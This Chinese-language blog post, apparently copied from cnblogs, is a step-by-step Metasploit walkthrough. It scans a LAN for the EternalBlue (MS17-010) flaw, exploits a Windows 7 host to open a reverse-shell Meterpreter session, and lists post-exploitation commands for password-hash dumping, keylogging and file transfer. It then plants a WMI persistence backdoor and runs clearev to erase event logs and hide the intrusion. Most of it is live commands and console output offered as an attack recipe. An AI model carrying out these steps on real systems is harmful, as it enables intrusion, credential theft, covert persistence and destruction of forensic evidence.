zoukankan      html  css  js  c++  java
  • metasploit的常用模块,永恒之蓝,持久化 清理痕迹

    永恒之蓝扫描模块 ,扫描局域网中有那些存在永恒之蓝漏洞

    msf5 > search  eternalblue
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
       2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
       5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
    
    
    msf5 > use  auxiliary/scanner/smb/smb_ms17_010
    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
    
    Module options (auxiliary/scanner/smb/smb_ms17_010):
    
       Name         Current Setting                                                               Required  Description
       ----         ---------------                                                               --------  -----------
       CHECK_ARCH   true                                                                          no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                                          no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                                         no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /home/testpoc/metasploit/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        445                                                                           yes       The SMB service port (TCP)
       SMBDomain    .                                                                             no        The Windows domain to use for authentication
       SMBPass                                                                                    no        The password for the specified username
       SMBUser                                                                                    no        The username to authenticate as
       THREADS      1                                                                             yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/smb/smb_ms17_010) >
    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.*
    RHOSTS => 192.168.1.*
    msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
    THREADS => 10
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    
    [-] 192.168.1.2:445       - An SMB Login Error occurred while connecting to the IPC$ tree.
    [-] 192.168.1.16:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
    [*] 192.168.1.*:445       - Scanned  33 of 256 hosts (12% complete)
    [-] 192.168.1.40:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
    [-] 192.168.1.39:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
    [-] 192.168.1.48:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
    [*] 192.168.1.*:445       - Scanned  52 of 256 hosts (20% complete)
    [*] 192.168.1.*:445       - Scanned  78 of 256 hosts (30% complete)
    [+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    [+] 192.168.1.88:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
    [-] 192.168.1.96:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
    [+] 192.168.1.95:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
    [-] 192.168.1.100:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
    [*] 192.168.1.*:445       - Scanned 106 of 256 hosts (41% complete)
    [+] 192.168.1.109:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
    [-] 192.168.1.126:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
    [-] 192.168.1.124:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
    [+] 192.168.1.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.1.*:445       - Scanned 133 of 256 hosts (51% complete)

    显示带有  Host is likely VULNERABLE   就是可能存在漏洞的机器

    永恒之蓝利用

    msf5 auxiliary(scanner/smb/smb_ms17_010) > use  exploit/windows/smb/ms17_010_eternalblue
    s[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set  RHOSTS 192.168.1.78
    RHOSTS => 192.168.1.78
    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
    
    Module options (exploit/windows/smb/ms17_010_eternalblue):
    
       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS         192.168.1.78     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
    
    
    Payload options (windows/x64/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs
    
    
    msf5 exploit(windows/smb/ms17_010_eternalblue) > run
    
    [*] Started reverse TCP handler on 192.168.1.137:4444
    [*] 192.168.1.78:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.1.78:445      - Scanned 1 of 1 hosts (100% complete)
    [*] 192.168.1.78:445 - Connecting to target for exploitation.
    [+] 192.168.1.78:445 - Connection established for exploitation.
    [+] 192.168.1.78:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 192.168.1.78:445 - CORE raw buffer dump (42 bytes)
    [*] 192.168.1.78:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 192.168.1.78:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 192.168.1.78:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
    [+] 192.168.1.78:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 192.168.1.78:445 - Trying exploit with 12 Groom Allocations.
    [*] 192.168.1.78:445 - Sending all but last fragment of exploit packet
    [*] 192.168.1.78:445 - Starting non-paged pool grooming
    [+] 192.168.1.78:445 - Sending SMBv2 buffers
    [+] 192.168.1.78:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 192.168.1.78:445 - Sending final SMBv2 buffers.
    [*] 192.168.1.78:445 - Sending last fragment of exploit packet!
    [*] 192.168.1.78:445 - Receiving response from exploit packet
    [+] 192.168.1.78:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 192.168.1.78:445 - Sending egg to corrupted connection.
    [*] 192.168.1.78:445 - Triggering free of corrupted buffer.
    [*] Sending stage (201283 bytes) to 192.168.1.78
    [*] Meterpreter session 1 opened (192.168.1.137:4444 -> 192.168.1.78:49595) at 2021-02-03 07:32:10 +0000
    By[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    meterpreter >
    #成功获取到session

    注意,如果payload 不是当前这个 建议使用 set payload windows/x64/meterpreter/reverse_tcp 改成当前这个

     

    获取到session后的常用命令:

    help #获取所有可用命令

    getuid #获取当前权限

    screenshot #截屏

    hashdump #获取密码的hash

    ps #获取进程列表

    sysinfo #获取系统信息

     route #获取路由表

    getpid #获取当前攻入的进程pid

    migrate #将当前后门注入迁移到其他程序

    keyscan_start # 开启键盘记录

    keyscan_dump #显示键盘记录  使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

    download/upload #上传下载文件

    keyscan_stop # 监视键盘记录

    bg # 回到metasploit界面

     执行一些命令后 使用bg回到主界面 使用session 可以看到存在一个session ,可以使用 session 1再次进入

    获取到权限后 接下来就是留下后门 可以使用 search persistence

    msf5 exploit(windows/smb/ms17_010_eternalblue) > search persis
    
    Matching Modules
    ================
    
       #   Name                                                        Disclosure Date  Rank       Check  Description
       -   ----                                                        ---------------  ----       -----  -----------
       0   auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss  2015-04-08       normal     No     Arris / Motorola Surfboard SBG6580 Web Interface Takeover
       1   auxiliary/scanner/http/lucky_punch                                           normal     No     HTTP Microsoft SQL Injection Table XSS Infection
       2   auxiliary/server/regsvr32_command_delivery_server                            normal     No     Regsvr32.exe (.sct) Command Delivery Server
       3   exploit/android/browser/webview_addjavascriptinterface      2012-12-21       excellent  No     Android Browser and WebView addJavascriptInterface Code Execution
       4   exploit/linux/http/ubiquiti_airos_file_upload               2016-02-13       excellent  No     Ubiquiti airOS Arbitrary File Upload
       5   exploit/linux/local/apt_package_manager_persistence         1999-03-09       excellent  No     APT Package Manager Persistence
       6   exploit/linux/local/autostart_persistence                   2006-02-13       excellent  No     Autostart Desktop Item Persistence
       7   exploit/linux/local/bash_profile_persistence                1989-06-08       normal     No     Bash Profile Persistence
       8   exploit/linux/local/cron_persistence                        1979-07-01       excellent  No     Cron Persistence
       9   exploit/linux/local/rc_local_persistence                    1980-10-01       excellent  No     rc.local Persistence
       10  exploit/linux/local/service_persistence                     1983-01-01       excellent  No     Service Persistence
       11  exploit/linux/local/yum_package_manager_persistence         2003-12-17       excellent  No     Yum Package Manager Persistence
       12  exploit/multi/misc/persistent_hpca_radexec_exec             2014-01-02       great      Yes    HP Client Automation Command Injection
       13  exploit/osx/local/persistence                               2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
       14  exploit/osx/local/sudo_password_bypass                      2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
       15  exploit/unix/local/at_persistence                           1997-01-01       excellent  Yes    at(1) Persistence
       16  exploit/windows/browser/ms10_018_ie_behaviors               2010-03-09       good       No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
       17  exploit/windows/local/persistence                           2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
       18  exploit/windows/local/persistence_image_exec_options        2008-06-28       excellent  No     Windows Silent Process Exit Persistence
       19  exploit/windows/local/persistence_service                   2018-10-20       excellent  No     Windows Persistent Service Installer
       20  exploit/windows/local/ps_persist                            2012-08-14       excellent  No     Powershell Payload Execution
       21  exploit/windows/local/ps_wmi_exec                           2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
       22  exploit/windows/local/registry_persistence                  2015-07-01       excellent  Yes    Windows Registry Only Persistence
       23  exploit/windows/local/s4u_persistence                       2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
       24  exploit/windows/local/vss_persistence                       2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
       25  exploit/windows/local/wmi_persistence                       2017-06-06       normal     No     WMI Event Subscription Persistence
       26  exploit/windows/smb/psexec_psh                              1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
       27  payload/cmd/unix/bind_inetd                                                  normal     No     Unix Command Shell, Bind TCP (inetd)
       28  payload/cmd/windows/bind_perl                                                normal     No     Windows Command Shell, Bind TCP (via Perl)
       29  payload/cmd/windows/bind_perl_ipv6                                           normal     No     Windows Command Shell, Bind TCP (via perl) IPv6
       30  payload/php/bind_perl                                                        normal     No     PHP Command Shell, Bind TCP (via Perl)
       31  payload/php/bind_perl_ipv6                                                   normal     No     PHP Command Shell, Bind TCP (via perl) IPv6
       32  post/linux/manage/sshkey_persistence                                         excellent  No     SSH Key Persistence
       33  post/windows/gather/enum_ad_managedby_groups                                 normal     No     Windows Gather Active Directory Managed Groups
       34  post/windows/manage/install_ssh                                              normal     No     Install OpenSSH for Windows
       35  post/windows/manage/persistence_exe                                          normal     No     Windows Manage Persistent EXE Payload Installer
       36  post/windows/manage/portproxy                                                normal     No     Windows Manage Set Port Forwarding With PortProxy
       37  post/windows/manage/sshkey_persistence                                       good       No     SSH Key Persistence
       38  post/windows/manage/sticky_keys                                              normal     No     Sticky Keys Persistance Module

    然后选一个顺眼的留下后门

    注意  windows 下选择 exploit/windows/local 开头的 

    如下

    msf5 exploit(windows/local/ps_wmi_exec) > use exploit/windows/local/wmi_persistence
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf5 exploit(windows/local/wmi_persistence) > show options
    
    Module options (exploit/windows/local/wmi_persistence):
    
       Name                Current Setting  Required  Description
       ----                ---------------  --------  -----------
       CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
       CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
       EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
       PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
       PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
       SESSION                              yes       The session to run this module on.
       USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
       WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
       **DisablePayloadHandler: True   (no handler will be created!)**
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows
    
    
    msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
    SESSION => 1
    msf5 exploit(windows/local/wmi_persistence) > run

    留下后门后 注意清理痕迹 

    使用sessions  1 进入session 

    使用clearev 清理痕迹

  • 相关阅读:
    搜索框用定时器限制发送请求
    vue的生命周期,钩子函数
    事件委托的实现流程
    在vscode中快速生成vue模板
    JS继承
    各种宽高
    ES6新特性
    python入门学习一
    字符编码
    npm install --save 与 npm install --save-dev 的区别
  • 原文地址:https://www.cnblogs.com/skycandy/p/14367421.html
Copyright © 2011-2022 走看看